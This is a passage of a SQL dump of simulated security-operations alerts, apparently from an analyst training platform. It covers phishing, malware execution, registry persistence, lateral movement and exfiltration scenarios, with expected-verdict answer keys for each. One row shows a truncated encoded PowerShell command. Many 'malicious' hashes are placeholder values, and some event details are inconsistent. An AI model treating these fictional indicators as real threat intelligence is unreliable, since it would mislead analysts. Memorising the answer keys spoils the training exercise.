4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"DLP\\\",\\\"severity\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1351, 'Phishing Email Detected', 'high', 'Corporate Email Security System', 'An employee at a South Korean defense contractor receives a suspicious email purporting to be from a known supplier. The email contains a malicious attachment designed to install malware upon opening.', 'Initial Access', 'T1566.001 - Phishing: Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:22Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.3.45\",\"email_subject\":\"Urgent: New Contract Draft\",\"sender_email\":\"supplier@example.com\",\"recipient_email\":\"employee@skdefense.kr\",\"attachment_name\":\"Contract_Draft.exe\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"action_taken\":\"Email quarantined\",\"alert_id\":\"ALERT-20231005-0001\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"supplier@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Email Reputation System\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently registered and used in phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Contract_Draft.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Executable file containing known malware signature\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware 
sample\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.853Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1352, 'Malware Execution Triggered', 'high', 'Endpoint Detection and Response (EDR) System', 'A custom malware variant attributed to the Andariel group has been executed on the host system, providing the attacker with remote access capabilities.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-31T14:32:58Z\",\"event_id\":\"4688\",\"host_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"process\":{\"name\":\"WINWORD.EXE\",\"path\":\"C:\\\\Program Files\\\\Microsoft Office\\\\Office16\\\\WINWORD.EXE\"},\"file\":{\"name\":\"invoice.docx\",\"path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice.docx\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"},\"network\":{\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443},\"malware\":{\"name\":\"Andariel\",\"variant\":\"Custom\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Andariel C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a known Andariel malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"File used as a dropper in recent attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, 
NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1353, 'Persistence Mechanism Established', 'medium', 'System Registry Monitoring', 'The malware modifies system registry keys to maintain persistence, allowing the attackers to retain access even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:27Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"modified_by_user\":\"jdoe_admin\",\"malware_filename\":\"evilapp.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_context\":\"SYSTEM\",\"description\":\"Persistence mechanism established via registry key modification.\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with evilapp.exe.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"evilapp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File used in persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this 
user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key 
modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1354, 'Lateral Movement Detected', 'medium', 'Network Traffic Analysis', 'The attackers leverage stolen credentials to move laterally within the corporate network over SMB, targeting systems with access to sensitive defense sector data.', 'Lateral Movement', 'T1021.002: Remote Services: SMB/Windows Admin Shares', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T10:32:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.0.0.45\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"file_accessed\":\"\\\\\\\\10.0.0.45\\\\sensitive\\\\project_plan.docx\",\"external_attacker_ip\":\"203.0.113.15\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"access_granted\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with lateral movement activity\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"hash_lookup_service\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with abnormal file access 
patterns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1355, 'Sensitive Data Exfiltration', 'critical', 'Data Loss Prevention (DLP) Alerts', 'The attackers have initiated the exfiltration of sensitive intellectual property related to defense contracts and ATM transaction data to an external malicious server.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"alert_id\":\"DLP-EXFIL-00342\",\"source_ip\":\"10.1.2.34\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"filename\":\"defense_contract_2023.pdf\",\"hash\":\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\",\"username\":\"jdoe\",\"action\":\"exfiltrate\",\"status\":\"blocked\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"defense_contract_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document flagged for unauthorized transfer.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in suspicious 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1356, 'Suspicious Access Attempt Detected', 'medium', 'Network IDS Logs', 'A suspicious access attempt was detected as BlueNoroff initiated a campaign by exploiting vulnerabilities in the target\'s web application. The objective was to gain unauthorized access to the cryptocurrency startup\'s network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:12:07Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.100\",\"src_port\":443,\"dest_port\":80,\"protocol\":\"HTTP\",\"alert\":\"Potential Exploit Detected\",\"signature_id\":\"2000011\",\"signature\":\"WEB-APP Remote Code Execution Vulnerability\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"uri\":\"/vulnerable_endpoint\",\"method\":\"POST\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by BlueNoroff\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1357, 'Execution of Malicious Payload', 'high', 'Endpoint Security Logs', 'An endpoint has executed a payload associated with the AppleJeus malware, disguised as a cryptocurrency application. This execution could lead to unauthorized access and data exfiltration.', 'Execution', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"username\":\"jdoe\",\"process_name\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\CryptoTrader.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_description\":\"Process execution detected\",\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\CryptoTrader.exe\\\" -silent\",\"malware_family\":\"AppleJeus\",\"severity\":\"High\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host in corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\CryptoTrader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Executable associated with AppleJeus malware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matched AppleJeus malware 
sample\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" 